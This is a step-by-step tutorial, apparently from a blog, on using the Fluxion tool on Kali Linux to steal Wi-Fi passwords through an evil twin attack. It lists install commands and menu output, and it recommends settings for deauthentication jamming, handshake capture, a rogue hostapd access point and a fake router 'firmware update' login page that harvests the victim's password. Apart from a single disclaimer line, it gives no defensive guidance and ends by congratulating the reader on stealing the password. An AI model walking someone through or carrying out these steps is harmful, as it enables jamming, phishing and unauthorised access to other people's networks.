Nowadays Wi-Fi is everywhere in home, office, coffee shops and even in the streets, but all the people who use them are not really aware of the cyber threats and cyber security or how these devices work. Someone can use Fluxion and perform an evil twin attack can steal Wi-Fi passwords by doing a deauthentication attack and stopping the user from connecting to the Wi-Fi. And also create a fake Wi-Fi with the same name and confuse the user to connect with the fake Wi-Fi and do phishing technique to steal the password from the user.
It sounds very complicated today anyone can do this with the help of few tools and scripts like Fluxion. Which can easily do all these stuffs just by selecting few options.
How Fluxion works?
Fluxion is a excellent coded script which uses social engineering attack framework like phishing, creating fake access point of the wifi, jamming the real wifi interface and capturing the handshake. Not only it capture the handshake but also verifies the WPA password when the user submits the password in the fake page.
It jams the original Wi-Fi interface and creates a fake clone with the same name, attracts the disconnected user to join the fake one. It creates a fake login page and pretends the router needs to restart or load firmware and requests the Wi-Fi password to continue.
It continuously jams the Wi-Fi interface until the user puts the real password, if the user puts fake one this process carries on. When the password of the handshake and the password given by user is matched, then it closes the fake Wi-Fi and releases the jamming. So the user gets automatically connected to the real one and they don’t have any clue what happened.
How to Use and Capture WPA Passwords with Fluxion
(Hardware requirements- WIFI compatible with kali linux which support packet injection and monitor mod.) Click here to get one for yourself.
Note:- The goal of the article is to make you aware of the cyber threats and educate you on cyber security
Step- 1 Install Fluxion
Open your terminal in kali linux and clone the clone the Git Fluxion repository with:
~# git clone https://github.com/FluxionNetwork/fluxion
Cloning into 'fluxion'...
remote: Enumerating objects: 2646, done.
remote: Total 2646 (delta 0), reused 0 (delta 0), pack-reused 2646
Receiving objects: 100% (2646/2646), 26.14 MiB | 83.00 KiB/s, done.
Resolving deltas: 100% (1433/1433), done.
Go to the folder, then list the contents to see the files in it.
~# cd fluxion
~/fluxion# ls
docs install lib logos scripts bin siteinstaller.py
fluxion.sh language locale README.md sitesThen give executable permission to the fluxion.sh file
~/fluxion# chmod +x fluxion.sh
The start it up for the first time with ./fluxion.sh (if not root, use sudo ./fluxion.sh). You’ll likely see the following, where some dependencies maybe missing.
~/fluxion# ./fluxion.sh
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[ ]
[ FLUXION 6 < Fluxion Is The Future > ]
[ ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
aircrack-ng.....OK!
aireplay-ng.....OK!
airmon-ng.......OK!
airodump-ng.....OK!
awk.............OK!
curl............OK!
dhcpd...........Not installed (isc-dhcp-server)
hostapd.........OK!
iwconfig........OK!
lighttpd........Not installed
macchanger......OK!
mdk3............OK!
nmap............OK!
php-cgi.........Not installed
pyrit...........OK!
python..........OK!
unzip...........OK!
xterm...........OK!
openssl.........OK!
rfkill..........OK!
strings.........OK!
fuser...........OK!Now to install all the missing packages type ./fluxion.sh -i
After everything is installed now you can proceed to the attack interface. Then you will see something like this and choose your language. Do so by typing the number next to the one you want and press Enter
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[ ]
[ FLUXION 6 < Fluxion Is The Future > ]
[ ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[2] Select your language
[1] English
[2] German
[3] Romanian
[4] Turkish
[5] Spanish
[6] Chinese
[7] Italian
[8] Czech
[9] Greek
[10] French
[11] SlovenianStep- 2 Scan Wi-Fi Hotspots
After selecting the language you need to Choose the wireless attack for access point (AP)
Here select option 2 Handshake Spoofer to capture the handshake cap file.
Select the wireless attack for access point [1] Captive Portal Create an "evil twin" access point. [2] Handshake Spoofer Acquires WPA/WPA2 encryption hashes. [3]Back
Now here you will see the options to select the wireless interface or the wifi adaptor. Select any one you may like
Select a wireless interface for target searching.
[1] fluxwl0 Ralink Technology, corp. MT7601U
[2] wlan0 Unknown chipset for SDIO device
[3] Repeat
[4] Back
Then here select the channel to start scanning the Wi-Fi networks on that channel. You can select anyone but selecting All channels (2.4GHz – 5GHz) is most recommended.
[i] Select channel to monitor
[1] All channels 2.4GHz
[2] All channels 5GHz
[3] All channels (2.4GHz & 5GHz)
[4] Specific channel(s)
[5] Back
Step- 3 Choose Your Target AP
Now it will show you the Wi-Fi list near you. Not only that it will also show you the Wi-Fi security, channel on which those are running, MAC address of the router. And select your target Wi-Fi.
WIFI LIST
ID ESSID QLTY PWR CH SECURITY SECURITY BSSID
[001] AndroidAP 96 -61 6 61% WPA2 BC:F6:85:04:A9:98
[002] h@ckgod 100 -55 4 55% WPA2 WPA 84:63:E9:76:A4:E3
Step- 4 Get the handshake
Now you will get the option to select the Wi-Fi adapter for monitoring and jamming the Wi-Fi (recommended the same interface you selected before).
Here you have to select the select tool which you wanna use for jamming the Wi-Fi and kicking the user out of the network. You can use any one, but my personal favorite in [3] mdk4 deauthentication
[*] Select a method for handshake retrieval
[1] Monitor (passive)
[2] aireplay-ng deauthentication (aggressive)
[3] mdk4 deauthentication (aggressive)
Now you will get the option to select the Wi-Fi adapter for monitoring and jamming the Wi-Fi (recommended the same interface you selected before).
[*] Select a wireless interface for target searching
[1] fluxwl0 Ralink Technology, corp. MT7601U
[2] wlan0 Unknown chipset for SDIO device
[3] Repeat
[4] Back
If the user gives fake password then all the effort will be pointless. So to verify the password you receive you need to check it with the handshake. Use cowpatty verification which is recommended.
[*] select a method of verification for the hash
[1] aircrack-ng verification (unreliable)
[2] cowpatty verification (recommended)
[3] pyrit verification
[4] Back
Here select the time duration of verifying hash. Select as less as possible from the options. Every 30 seconds (recommended).
[*] How often should the verifier check the handshake?
[1] Every 30 seconds (recommended)
[2] Every 60 seconds
[3] Every 90 seconds
[4] Back
Select the verification occur process. Synchronously is generally recommended. But if you have a good and fast system then you can select Asynchronously.
[*] How should verification occur?
[1] Asynchronously
[2] Synchronously (recommended)
[3] Back
And this will start the attack and three windows will open in front of you. The first window captures the handshake, second window verifies the handshake and the third window sends deauthentication packets to the Wi-Fi networks which stops the user to connect to the Wi-Fi.
Now wait for few moments unless you see a blinking message which says “Success: A valid hash was detected and saved”
Now close all the windows. Back in the terminal, select “Select another attack,” and hit Enter to proceed further.
Step- 5 Setup Captive Portal
You will see this took you to the first menu where you started from, but this time you have to select the first option “Captive Portal Create an “evil twin” access point“. After selecting it will ask you if you want to continue with the same target Wi-Fi or not, Select “Y” to continue.
[*] Select the wireless attack for access point
[1] Captive Portal Create an "evil twin" access point.
[2] Handshake Spoofer Acquires WPA/WPA2 encryption hashes.
[3] Back
Now again choose the Wi-Fi interface to track your target Wi-Fi and monitor them, use the same Wi-Fi adapter you choose previously.
[*] Select a wireless interface for target tracking.
[1] fluxwl0 Ralink Technology, corp. MT7601U
[2] wlan0 Unknown chipset for SDIO device
[3] Repeat
[4] BackThis time you will see the same option again, but read carefully that is asking you to select Wi-Fi interface to jam the target Wi-Fi and stop the users to join it. Select the same one as before.
[*] Select a wireless interface for target jamming.
[1] fluxwl0 Ralink Technology, corp. MT7601U
[2] wlan0 Unknown chipset for SDIO device
[3] Repeat
[4] BackFor the last time when it will show the same type of options, it will ask you to select the Wi-Fi interface for access point (AP) or creating fake Wi-Fi. In this last options choose the other Wi-Fi adapter.
[*] Select a wireless interface for the access point.
[1] fluxwl0 Ralink Technology, corp. MT7601U
[2] wlan0 Unknown chipset for SDIO device
[3] Repeat
[4] Back
Step- 6 Method Selection
In the method selection you have to select different types of methods and tools which we selected for monitoring, tracking, jamming, creating fake access point, password verification, etc.
Firstly you have to select the deauthentication method for the tool to deauth and kick out all the connected users. You can choose anyone from the following, but mdk4 is mostly recommended.
[*] Select a method of deauthentication
[1] mdk4
[2] aireplay
[3] mdk3
Then choose the method for access point to create a fake copy of the Wi-Fi with the same name. Selecting hostapd is mostly recommended it will create a fake hotspot with the information this tool captured till now. Airbase-ng will also perform the same way like hostapd but it’s a bit slow.
[*] Select an access point service
[1] Rogue AP - hostapd (recommended)
[2] Rogue AP - airbase-ng (slow)
[3] Back
To verify the password received you have to check it against the captured handshake. In your screen you will see some method options to verify the password. The most recommended is cowpatty hash, you can use others if you like.
[*] Select a password verification method
[1] hash - cowpatty
[2] hash - aircrack-ng
[3] hash - pyrit
[4] Back
You will see the below options to select the specific hash you captured. select [1] use hash found. this will select the current hash you received from the previous hash spoofing method.
[*] A hash for target AP was found.
[*] Do you want to use this file?
[1] Use hash found
[2] Specific path for hash
[3] Rescan hash directory
[3] Back
Now select the method for verifying the hash, cowpatty verification is highly recommended.
Select a method of verification for the hash
[1] aircrack-ng verification
[2] cowpatty verification
[3] pyrit verification
Step- 7 Create Fake Login
To start with the captive portal attack you need to create a fake login page and ssl certificate to steal the password.
You may see some options like below on your screen for choosing the ssl certificate. Choose [1] Create an SSL certificate and then a window will pop up and will generate a RSA private key.
[*] Select SSL certificate source for captive portal
[1] Create a SSL certificate
[2] Search for SSl certificate
[3] None
[4] Back
After creating an SSL certificate, select an internet connectivity type from the following to kick the user out of your target Wi-Fi network. Mostly disconnected is recommended.
[*] Select an internet connectivity type for rogue network.
[1] disconnected
[2] emulated
[3] Back
Now finally the last step to choose the fake login page. You just need to select the right language according to you or the router brand of the target Wi-Fi like TP-Link, D-Link,etc and hit Enter.
[*] Select the captive portal interface for the rough network.
[1] English [ENG] (NEUTRA)
[2] German [GER] (NEUTRA)
[3] Russian [RUS] (NEUTRA)
[4] Italian [IT] (NEUTRA)
[5] Spanish [ESP] (NEUTRA)
[6] Portuguese [POR] (NEUTRA)
[7] Chinese [CN] (NEUTRA)
[8] French [FR] (NEUTRA)
[9] Turkish [TR] (NEUTRA)
[10] Romanian [RO] (NEUTRA)
[11] Hungarian [HU] (NEUTRA)
[12] Arabic [ARA] (NEUTRA)
[13] Greek [GR] (NEUTRA)
[14] Czech [CZ] (NEUTRA)
[15] Norwegian [NO] (NEUTRA)
[16] Bulgarian [BG] (NEUTRA)
[17] Serbian [SRB] (NEUTRA)
[18] Polish [PL] (NEUTRA)
[19] Indonesian [ID] (NEUTRA)
[20] Dutch [NL]
[21] Danish [DAN]
[22] Hebrew [HE]
[23] Thai [TH]
[24] Portuguese [BR]
[25] Slovenian [SVN]
[26] Belkin [ENG]
[27] Netgear [ENG]
[28] Huawei [ENG]
[29] Verizon [ENG]
[30] Netgear [ESP]
[31] Arris [ESP]
[32] Vodafone [ESP]
[33] TP-Link [ENG]
[34] Ziggo [NL]
[35] KPN [NL]
[36] Zigoo2016 [NL]
[37] FRITZBOX_DE [DE]
[38] FRITZBOX_ENG [ENG]
[39] GENEXIS_DE [DE]
[40] Login-Netgear [Login-Netgear]
[41] Login-Xfinity [Login-Xfinity]
[42] Telekom
[43] Google
[44] MOVISTAR [ESP]
[45] Back
Step- 8 Start the attack
Now your attack will start automatically and six windows will pop up in front of you. After your attack starts the users of the target Wi-Fi will be disconnected automatically form the Wi-Fi and they will see two Wi-Fi with the same name. The user will not be able to connect with the real network and the phone will automatically connect with the fake one because it is not protected with any password.
As soon as the user connects with your fake one you will be able to see some information in those terminal windows which popped up in front of you. And in the users phone the browser will open which will say “Wi-Fi framework update” and asks the user to provide the password for the update. If the user enters the password this tool will verify the password with the hash you captured, if the password is wrong then it will say wrong password to the user and the attack will continue. When the user enters the correct password the user will see some framework updating and in your terminal you will see five of the pop up windows will close automatically and in one window you will see a message “The password was saved in/(path of the file)”.
Congrats you successfully stole the password.
